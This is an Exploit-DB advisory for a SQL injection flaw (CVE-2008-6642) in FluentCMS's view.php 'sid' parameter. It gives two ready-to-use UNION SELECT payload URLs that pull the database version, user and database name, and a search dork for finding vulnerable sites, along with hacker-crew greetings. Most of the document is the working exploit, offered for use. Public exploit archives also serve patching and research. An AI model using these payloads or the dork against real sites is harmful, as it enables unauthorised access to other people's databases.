FluentCMS view.php sid Remote SQL Injection Vulnerability

2008-04-27T00:00:00
ID EDB-ID:5509
Type exploitdb
Reporter cO2
Modified 2008-04-27T00:00:00

Description

FluentCMS (view.php sid) Remote SQL Injection Vulnerability. CVE-2008-6642. Webapps exploit for php platform

                                        
                                            ###################################################
[~] FluentCMS Remote Sql Ä°nj. Vuln.
                                                                                                              
[~] Founder: cO2 [ Algeria Security Crew ]
[~] HomePage: http://www.DZ-Secure.com
[~] Greatz : To all Hackerz from Algeria & All My Friends . . .
[~] Contact: c02@Hotmail.de
[~] Greetz2 : Str0ke,Inphex,DigitalMind,His0k4,Stack-Terrorist,mArEzZinA,Waraxe,Str0xo
[~] Speacial thanks to : Inphex
[~] Dork :  Powered by FluentCMS
[~] Exploit :
http://www.xxx.org/view.php?sid=-5926+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,unhex(hex(version())),17,unhex(hex(user())),unhex(hex(database())),20,21,22,23,24,25,26,27,28,29,30,31,32--
or
http://www.xxx.org/view.php?sid=-3+union+select+1,2,3,unhex(hex(user())),5,6,7,unhex(hex(database())),9,10,11,12,13,14,unhex(hex(version())),16--
---------------------
http://www.DZ-Secure.com
---------------------
###############################################

# milw0rm.com [2008-04-27]